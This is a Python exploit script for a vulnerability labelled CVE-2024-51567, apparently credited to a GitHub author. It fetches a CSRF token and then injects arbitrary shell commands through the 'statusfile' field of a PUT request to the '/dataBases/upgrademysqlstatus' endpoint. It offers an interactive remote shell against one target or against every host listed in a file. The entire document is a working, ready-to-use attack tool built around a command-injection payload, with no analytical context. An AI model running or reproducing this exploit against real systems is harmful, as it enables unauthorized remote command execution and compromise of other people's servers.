import httpx import sys import os def display_banner(): banner = """ ██████╗ ██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ███████╗ ██╗███████╗ ██████╗ ███████╗ ██╔════╝ ██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ██╔════╝███║██╔════╝██╔════╝ ╚════██║ ██║ ██║ ██║█████╗ █████╗ █████╔╝██║██╔██║ █████╔╝███████║████╗███████╗╚██║███████╗███████╗ ██╔╝ ██║ ╚██╗ ██╔╝██╔══╝ ╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚═══╝╚════██║ ██║╚════██║██╔═══██╗ ██╔╝ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ ██║ ███████║ ██║███████║╚██████╔╝ ██║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚══════╝ ╚═╝╚══════╝ ╚═════╝ ╚═╝ github/ajayalf """ print(banner) def get_CSRF_token(client): resp = client.get("/") print("Cookies received:", resp.cookies) if 'csrftoken' in resp.cookies: return resp.cookies['csrftoken'] else: print("Error: CSRF token not found in cookies.") sys.exit(1) def pwn(client, CSRF_token, cmd): headers = { "X-CSRFToken": CSRF_token, "Content-Type": "application/json", "Referer": str(client.base_url) } payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token) return client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload).json().get("requestStatus", "Error") def exploit(client, cmd): CSRF_token = get_CSRF_token(client) stdout = pwn(client, CSRF_token, cmd) print(stdout) def run_exploit(target): client = httpx.Client(base_url=target, verify=False) while True: cmd = input("$> ") if cmd.lower() in ["exit", "quit"]: print("Exiting...") break exploit(client, cmd) if __name__ == "__main__": display_banner() if len(sys.argv) < 2: print("Usage: python CVE-2024-51567.py or python CVE-2024-51567.py ") sys.exit(1) target_arg = sys.argv[1] if os.path.isfile(target_arg): with open(target_arg, "r") as file: targets = [line.strip() for line in file if line.strip()] for target in targets: print(f"\nExploiting target: {target}") run_exploit(target) else: run_exploit(target_arg)